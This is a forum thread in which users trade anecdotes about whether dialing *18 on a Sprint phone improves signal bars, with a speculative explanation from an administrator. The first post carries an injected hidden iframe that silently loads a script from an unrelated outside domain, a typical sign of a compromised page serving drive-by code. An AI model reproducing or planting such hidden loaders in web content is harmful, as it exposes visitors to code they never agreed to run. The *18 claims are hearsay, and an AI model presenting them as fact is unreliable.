+ Reply to Thread

Thread: *18

I just tried this -- according to a post on sprintusers.com (that site sucks, by the way) it increases your signal strength by "pinging" the closest tower. Sounds like BS but it totally worked for me -- twice. Could be coincidence, by bars were up and down, but when I did it, I jumped to 5 bars. Anyone know anything more than anecdotal?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: *18

Originally posted by masonuc
    I just tried this -- according to a post on sprintusers.com (that site sucks, by the way) it increases your signal strength by "pinging" the closest tower. Sounds like BS but it totally worked for me -- twice. Could be coincidence, by bars were up and down, but when I did it, I jumped to 5 bars.
    Verrrry interesting. Just did the same thing for me. And I never get more than three bars (if I'm lucky) in the house. Hmm... I have a call to Alaska I can make... I'll give it a try and see if the call itself gets better reception. :p

Lisa
    The Writers' Collective - no shared royalties, ever.
    www.writerscollective.org

I get crappy reception in my house also and after *18 I still get crappy reception. Sounds like a urban legend to me. Anyone out there (Homer?) really know what this does?.... if anything.

I also read the thread about it on sprintusers.com. I agee the board is pretty lame (especially the format). Anyone know if there a a place where all the * and # special commands are documented?
    Carl

I would like to have all the * and # commands also. It would be helpfull.

What does pinging the tower do?

Administrator

Arrow

essentially, the phone will send out a signal to find the closest tower, and the tower that responds back first would be the closest tower. sometimes is possible you could be on a tower thats further away than another closer tower. if this *18 works, thats bascially what its doing...

just tried it at home in San Francisco. Hill continues to swallow signal. *18 made no difference.